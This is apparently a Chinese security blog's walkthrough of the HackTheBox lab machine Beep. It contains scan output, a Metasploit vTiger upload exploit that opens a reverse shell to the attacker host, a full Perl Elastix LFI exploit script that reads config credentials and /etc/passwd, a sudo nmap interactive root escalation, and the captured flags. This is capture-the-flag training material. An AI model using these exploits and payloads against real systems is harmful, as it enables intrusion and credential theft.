2020-04-07 2.5k

HTB::Beep Walkthrough

0x01 Info Card

0x02 Tools and Tips

nmap
sslscan
wfuzz
vtigercrm
LFI
Elastix / FreeFBX
Nmap Privilege Escalation

0x03 Pentesting

Initial Enumeration

端口扫描

# Nmap 7.80 scan initiated Tue Apr  7 03:18:33 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.25s latency).
Not shown: 987 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: TOP APOP UIDL IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) STLS RESP-CODES AUTH-RESP-CODE USER EXPIRE(NEVER) PIPELINING
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: THREAD=REFERENCES ATOMIC Completed MAILBOX-REFERRALS OK RENAME LISTEXT LITERAL+ MULTIAPPEND X-NETSCAPE LIST-SUBSCRIBED CHILDREN UNSELECT RIGHTS=kxte URLAUTHA0001 IDLE IMAP4rev1 SORT=MODSEQ ID BINARY IMAP4 CONDSTORE CATENATE SORT ANNOTATEMORE NO UIDPLUS STARTTLS ACL NAMESPACE THREAD=ORDEREDSUBJECT QUOTA
443/tcp   open  ssl/https?
|_ssl-date: 2020-04-07T07:23:36+00:00; +1m25s from scanner time.
880/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 1m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr  7 03:24:47 2020 -- 1 IP address (1 host up) scanned in 374.24 seconds

SSL scan

# kali @ kali in ~/HackTheBox/Beep [4:37:19] C:127
$ sslscan 10.10.10.7
Version: 2.0.0-static
OpenSSL 1.1.1f-dev  xx XXX xxxx

Connected to 10.10.10.7
Testing SSL server 10.10.10.7 on port 443 using SNI name 10.10.10.7                   

  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     enabled
TLSv1.0   enabled
TLSv1.1   disabled 
TLSv1.2   disabled
TLSv1.3   disabled                                                                   

  TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression enabled (CRIME)

  Heartbleed:
TLSv1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
Accepted  TLSv1.0  112 bits  DHE-RSA-DES-CBC3-SHA          DHE 1024 bits
Accepted  TLSv1.0  256 bits  AES256-SHA                    
Accepted  TLSv1.0  128 bits  AES128-SHA                    
Accepted  TLSv1.0  128 bits  RC4-SHA

Accepted  TLSv1.0  112 bits  DES-CBC3-SHA                 
Accepted  TLSv1.0  56 bits   TLS_RSA_WITH_DES_CBC_SHA     
Accepted  TLSv1.0  56 bits   TLS_DHE_RSA_WITH_DES_CBC_SHA 

  Server Signature Algorithm(s):
TLSv1.0  Server accepts all signature algorithms.

  SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength:    1024

Subject:  localhost.localdomain
Issuer:   localhost.localdomain

Not valid before: Apr  7 08:22:08 2017 GMT
Not valid after:  Apr  7 08:22:08 2018 GMT

wfuzz扫描目录

Getting User Access

寻找vtigercrm v5.1.0的漏洞

尝试``vtiger_php_exec不行再换vtiger_soap_upload`，可以反弹shell

msf5 exploit(multi/http/vtiger_php_exec) > use exploit/multi/http/vtiger_soap_upload
msf5 exploit(multi/http/vtiger_soap_upload) > show options

Module options (exploit/multi/http/vtiger_soap_upload):

   Name       Current Setting  Required  Description 
   ----       ---------------  --------  ----------- 
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /vtigercrm/      yes       Base vTiger CRM directory path
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   vTigerCRM v5.4.0


msf5 exploit(multi/http/vtiger_soap_upload) > set RHOSTS 10.10.10.7
RHOSTS => 10.10.10.7
msf5 exploit(multi/http/vtiger_soap_upload) > set RPORT 443
RPORT => 443
msf5 exploit(multi/http/vtiger_soap_upload) > set SSL true
SSL => true
msf5 exploit(multi/http/vtiger_soap_upload) > set LHOST 10.10.14.5
LHOST => 10.10.14.5

msf5 exploit(multi/http/vtiger_soap_upload) > check
[+] 10.10.10.7:443 - The target is vulnerable.
msf5 exploit(multi/http/vtiger_soap_upload) > exploit 

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Uploading payload...
[+] Upload successfully uploaded
[*] Executing payload...
[*] Sending stage (38288 bytes) to 10.10.10.7
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.7:43989) at 2020-04-07 10:50:50 -0400
[!] This exploit may require manual cleanup of 'bPRojImibS.php' on the target

meterpreter > 
[+] Deleted bPRojImibS.php
shell
Process 8916 created.
Channel 0 created.
id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)

获取user flag

python -c "import pty;pty.spawn('/bin/sh')"   
sh-3.2$ id
id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
sh-3.2$ pwd
pwd
/var/www/html/vtigercrm
sh-3.2$ cd /home/fanis
cd /home/fanis
sh-3.2$ ls -la
ls -la
total 32
drwxrwxr-x 2 fanis fanis 4096 Apr  7  2017 .
drwxr-xr-x 4 root  root  4096 Apr  7  2017 ..
-rw------- 1 fanis fanis  114 Apr  7  2017 .bash_history
-rw-r--r-- 1 fanis fanis   33 Apr  7  2017 .bash_logout
-rw-r--r-- 1 fanis fanis  176 Apr  7  2017 .bash_profile
-rw-r--r-- 1 fanis fanis  124 Apr  7  2017 .bashrc
-rw-rw-r-- 1 fanis fanis   33 Apr  7  2017 user.txt
sh-3.2$ cat user.txt
cat user.txt
aeff3def0c765c2677b94715cffa73ac

Getting Root Access

提权

sh-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

命中Nmap，以root权限执行且无需认证

较早版本的Nmap（2.02至5.21）具有交互模式，该模式允许用户执行Shell命令由于Nmap在以root特权执行的二进制文件列表中，因此可以使用交互式控制台来以相同的特权运行shell

sh-3.2$ sudo nmap --interactive
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
sh-3.2# cat /root/root.txt
cat /root/root.txt
d88e006123842106982acce0aaf453f0

Another Way

重点关注几个常见服务 22(ssh)、80(apache)、443(https)、3306(mysql)、10000(httpd)，访问 https://10.10.10.7:443 ，返回登录页面：

使用默认登录密码：username: admin password: palosanto，登录错误。

searchsploit找一下相关漏洞：

尝试本地包含漏洞，因为靶机上的SSL证书过期了，所以要修改一下利用脚本：

https://stackoverflow.com/questions/336575/can-i-force-lwpuseragent-to-accept-an-expired-ssl-certificate

#!/usr/bin/perl -w
#------------------------------------------------------------------------------------#Elastix is an Open Source Sofware to establish Unified Communications.               #About this concept, Elastix goal is to incorporate all the communication alternatives,                                                                         #available at an enterprise level, into a unique solution.                           #------------------------------------------------------------------------------------############################################################                         # Exploit Title: Elastix 2.2.0 LFI                                                   # Google Dork: :(                                                                     # Author: cheki                                                                       # Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;) 
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";
$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->ssl_opts(verify_hostname => 0, SSL_verify_mode => 0x00);
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {
 
print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";
 
}
else { 
print "\n[-] not successful\n";
        }

从之前 sslscan 的扫描结果我们看到靶机只支持 TLSv1.0，因此我们需要修改 Kali 的openssl配置文件

[system_default_sect]
#MinProtocol = TLSv1.2
#CipherString = [email protected]=2

MinProtocol = TLSv1.0
CipherString = DEFAUT

再执行利用脚本

# kali @ kali in ~/HackTheBox/Beep [5:15:57]
$ perl 37637.pl > elastix
# kali @ kali in ~/HackTheBox/Beep [5:16:34]
$ cat elastix
...
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
...

利用payload直接在网页上查看/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.

使用fanis : jEhdIekWmdjE登录靶机发现密码错误，再一看Writeup，直接是可以root登录…orz==

# kali @ kali in ~/HackTheBox/Beep [9:19:31] 
$ ssh [email protected]
[email protected]'s password: 
Last login: Tue Apr  7 16:20:42 2020 from 10.10.14.5

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[[email protected] ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[[email protected] ~]# cat /root/root.txt 
d88e006123842106982acce0aaf453f0
[[email protected] ~]# cat /home/fanis/user.txt 
aeff3def0c765c2677b94715cffa73ac

靶机->HTB
#靶机

文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox-Retired

HackTheBox-Active

VulnHub

代码审计

PHP代码审计

大数据安全

机器学习

基础学习

Python

Python基础

Python安全

Java

Java基础

Java安全

算法

Leetcode

随笔

经验

技术